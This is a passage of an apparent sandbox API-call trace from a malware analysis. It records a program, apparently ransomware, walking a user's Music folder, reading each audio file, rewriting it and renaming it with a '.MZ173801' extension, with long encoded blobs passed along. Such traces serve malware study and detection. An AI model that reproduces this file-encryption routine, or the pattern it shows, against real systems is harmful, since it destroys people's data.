GetCurrentThreadId () returned 0x1358 [0117.077] GetCurrentThreadId () returned 0x1358 [0117.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.078] GetCurrentThreadId () returned 0x1358 [0117.078] GetCurrentThreadId () returned 0x1358 [0117.078] GetCurrentThreadId () returned 0x1358 [0117.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\b79RtRRk9TDjgGdhgjZ.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\b79rtrrk9tdjggdhgjz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.078] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.078] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.078] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xecb1 [0117.078] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.078] ReadFile (in: hFile=0x404, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xecb1, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0xecb1, lpOverlapped=0x0) returned 1 [0117.079] CloseHandle (hObject=0x404) returned 1 [0117.080] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\b79RtRRk9TDjgGdhgjZ.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\b79rtrrk9tdjggdhgjz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.081] WriteFile (in: hFile=0x404, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0xecb1, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f424*=0xecb1, lpOverlapped=0x0) returned 1 [0117.233] CloseHandle (hObject=0x404) returned 1 [0117.294] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\b79RtRRk9TDjgGdhgjZ.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\b79rtrrk9tdjggdhgjz.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\b79RtRRk9TDjgGdhgjZ.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\b79rtrrk9tdjggdhgjz.wav.mz173801")) returned 1 [0117.295] GetCurrentThreadId () returned 0x1358 [0117.295] GetCurrentThreadId () returned 0x1358 [0117.295] GetCurrentThreadId () returned 0x1358 [0117.295] GetCurrentThreadId () returned 0x1358 [0117.295] GetCurrentThreadId () returned 0x1358 [0117.295] GetCurrentThreadId () returned 0x1358 [0117.295] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc543ee90, ftCreationTime.dwHighDateTime=0x1d5e6aa, ftLastAccessTime.dwLowDateTime=0x8ff6ae40, ftLastAccessTime.dwHighDateTime=0x1d5ea96, ftLastWriteTime.dwLowDateTime=0x8ff6ae40, ftLastWriteTime.dwHighDateTime=0x1d5ea96, nFileSizeHigh=0x0, nFileSizeLow=0x18c9d, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="IOVI.m4a", cAlternateFileName="")) returned 1 [0117.295] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.295] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\IOVI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\iovi.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc543ee90, ftCreationTime.dwHighDateTime=0x1d5e6aa, ftLastAccessTime.dwLowDateTime=0x8ff6ae40, ftLastAccessTime.dwHighDateTime=0x1d5ea96, ftLastWriteTime.dwLowDateTime=0x8ff6ae40, ftLastWriteTime.dwHighDateTime=0x1d5ea96, nFileSizeHigh=0x0, nFileSizeLow=0x18c9d)) returned 1 [0117.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.296] GetCurrentThreadId () returned 0x1358 [0117.296] GetCurrentThreadId () returned 0x1358 [0117.296] GetCurrentThreadId () returned 0x1358 [0117.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.297] GetCurrentThreadId () returned 0x1358 [0117.297] GetCurrentThreadId () returned 0x1358 [0117.297] GetCurrentThreadId () returned 0x1358 [0117.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\IOVI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\iovi.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.297] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.297] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.297] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x18c9d [0117.297] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.297] ReadFile (in: hFile=0x404, lpBuffer=0x23c2ad0, nNumberOfBytesToRead=0x18c9d, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesRead=0x19f418*=0x18c9d, lpOverlapped=0x0) returned 1 [0117.298] CloseHandle (hObject=0x404) returned 1 [0117.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\IOVI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\iovi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.306] WriteFile (in: hFile=0x404, lpBuffer=0x23dcb00*, nNumberOfBytesToWrite=0x18c9d, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23dcb00*, lpNumberOfBytesWritten=0x19f424*=0x18c9d, lpOverlapped=0x0) returned 1 [0117.308] CloseHandle (hObject=0x404) returned 1 [0117.311] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\IOVI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\iovi.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\IOVI.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\iovi.m4a.mz173801")) returned 1 [0117.311] GetCurrentThreadId () returned 0x1358 [0117.312] GetCurrentThreadId () returned 0x1358 [0117.312] GetCurrentThreadId () returned 0x1358 [0117.312] GetCurrentThreadId () returned 0x1358 [0117.312] GetCurrentThreadId () returned 0x1358 [0117.312] GetCurrentThreadId () returned 0x1358 [0117.312] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe0480, ftCreationTime.dwHighDateTime=0x1d5f07e, ftLastAccessTime.dwLowDateTime=0x2a8669c0, ftLastAccessTime.dwHighDateTime=0x1d5e603, ftLastWriteTime.dwLowDateTime=0x2a8669c0, ftLastWriteTime.dwHighDateTime=0x1d5e603, nFileSizeHigh=0x0, nFileSizeLow=0xb048, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="rUWxi6pNUN.wav", cAlternateFileName="RUWXI6~1.WAV")) returned 1 [0117.312] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.312] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\rUWxi6pNUN.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\ruwxi6pnun.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe0480, ftCreationTime.dwHighDateTime=0x1d5f07e, ftLastAccessTime.dwLowDateTime=0x2a8669c0, ftLastAccessTime.dwHighDateTime=0x1d5e603, ftLastWriteTime.dwLowDateTime=0x2a8669c0, ftLastWriteTime.dwHighDateTime=0x1d5e603, nFileSizeHigh=0x0, nFileSizeLow=0xb048)) returned 1 [0117.312] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.312] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 